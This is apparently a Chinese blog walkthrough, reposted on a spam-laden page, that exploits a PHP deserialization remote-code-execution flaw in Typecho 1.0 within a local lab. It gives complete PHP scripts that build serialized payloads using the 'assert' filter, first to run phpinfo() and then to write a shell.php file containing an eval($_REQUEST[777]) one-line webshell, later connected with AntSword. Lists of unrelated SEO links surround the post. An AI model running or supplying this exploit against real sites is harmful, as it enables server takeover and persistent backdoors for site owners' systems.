当前位置: 首页 > news >正文

注册公司的网站自助发稿

注册公司的网站,自助发稿,顺德高端网站,大丰微信网站开发公司文章目录 执行phpinfogetshell 执行phpinfo 将下面这段代码复制到一个php文件&#xff0c;命名为typecho_1.0-14.10.10_unserialize_phpinfo.php&#xff0c;代码中定义的类名与typecho中的类相同&#xff0c;是它能识别的类&#xff1a; <?php class Typecho_Feed{const…

文章目录

  • 执行phpinfo
  • getshell

执行phpinfo

将下面这段代码复制到一个php文件,命名为typecho_1.0-14.10.10_unserialize_phpinfo.php,代码中定义的类名与typecho中的类相同,是它能识别的类:

<?php
class Typecho_Feed{const RSS1 = 'RSS 1.0';const RSS2 = 'RSS 2.0';const ATOM1 = 'ATOM 1.0';const DATE_RFC822 = 'r';const DATE_W3CDTF = 'c';const EOL = "\n";private $_type;private $_items;public function __construct(){$this->_type = $this::RSS2;$this->_items[0] = array('title' => '1','link' => '1','date' => 1508895132,'category' => array(new Typecho_Request()),'author' => new Typecho_Request(),);}
}class Typecho_Request{private $_params = array();private $_filter = array();public function __construct(){$this->_params['screenName'] = 'phpinfo()';$this->_filter[0] = 'assert';}
}$exp = array('adapter' => new Typecho_Feed(),'prefix' => 'typecho_'
);echo base64_encode(serialize($exp));
?>

将文件放到虚拟机C:\phpstudy_2016\WWW\unserialize的目录下,打开后可以获得它的base64编码:

在这里插入图片描述

在typecho主页用hackbar进行代码注入,注入成功就说明此处存在RCE漏洞:

在这里插入图片描述

注入成功(说明此处存在RCE漏洞,也可以尝试getshell),回显出phpinfo界面:

在这里插入图片描述

getshell

同上,将这段利用代码复制到php文件中:

<?php
class Typecho_Feed{const RSS1 = 'RSS 1.0';const RSS2 = 'RSS 2.0';const ATOM1 = 'ATOM 1.0';const DATE_RFC822 = 'r';const DATE_W3CDTF = 'c';const EOL = "\n";private $_type;private $_items;public function __construct(){$this->_type = $this::RSS2;$this->_items[0] = array('title' => '1','link' => '1','date' => 1508895132,'category' => array(new Typecho_Request()),'author' => new Typecho_Request(),);}
}class Typecho_Request{private $_params = array();private $_filter = array();public function __construct(){$this->_params['screenName'] = "fputs(fopen('shell.php', w), '<?php phpinfo();@eval(\$_REQUEST[777])?>')";$this->_filter[0] = 'assert';}
}$exp = array('adapter' => new Typecho_Feed(),'prefix' => 'typecho_'
);echo base64_encode(serialize($exp));
?>

打开:
在这里插入图片描述

在hackbar中执行:

在这里插入图片描述

页面回显正常:

在这里插入图片描述

在typecho根目录下已经成功写入一个shell.php文件,里面包含一句话木马,并可以正常访问:

在这里插入图片描述

蚁剑测试连接成功:

在这里插入图片描述

成功获取webshell:

在这里插入图片描述

http://www.15wanjia.com/news/170459.html

相关文章:

  • hemi网站怎么做热图查网站是否正规
  • 开发公众号 微网站开发单页网站制作建站仿站
  • 基于jsp网站开发与实现做母婴育儿类网站好做seo排名吗
  • 做网站怎样备案微信公司网站
  • 网站建立后被别人点击要付钱吗微信建网站平台的
  • 安徽省建设工程造价协会网站phpwind怎么做网站
  • 做vlogger的网站有哪些督查营商环境建设网站
  • 谷歌做不做网站网站验收流程
  • 哪个网站可以做编程题做百度竞价什么网站好
  • 什么是网站建设中的专用主机网站开发html
  • 商务网站开发设计太原网站开发团队
  • 做银行应该关注的网站重庆网站建设seo
  • 网站存在的问题制作精美网站建设口碑好
  • 网站平台建设缴纳什么税微信开店免费平台
  • wordpress怎么搭建网站快对作业小程序入口
  • 上海做网站hlanggroup网站设计一般多少钱一个页面
  • 手工艺品外贸公司网站建设方案小外包公司
  • 网站开发人员职位需要上传视频的网站
  • 学网站建设的专业叫什么通付盾 网站公司建设
  • 酒店网站做的比较好的互助县公司网站建设
  • 怎么建立和设计公司网站手机兼职赚钱正规平台怎么找
  • 有多人做网站是个人备案怎么注册网址
  • 泉州做网站公司网络广告词
  • 郑州做网站_郑州免费建站我想做代加工
  • 品牌学习网站seo排名哪家公司好
  • 做亚克力在那个网站上好电子商务网站建设 代码
  • 做脚本的网站什么是网络营销与策划
  • 建设网站类策划书做响应式网站有什么插件
  • 包装材料网站建设免费做四年级题的网站
  • 自己可以做网站吗基于phpt漫画网站开发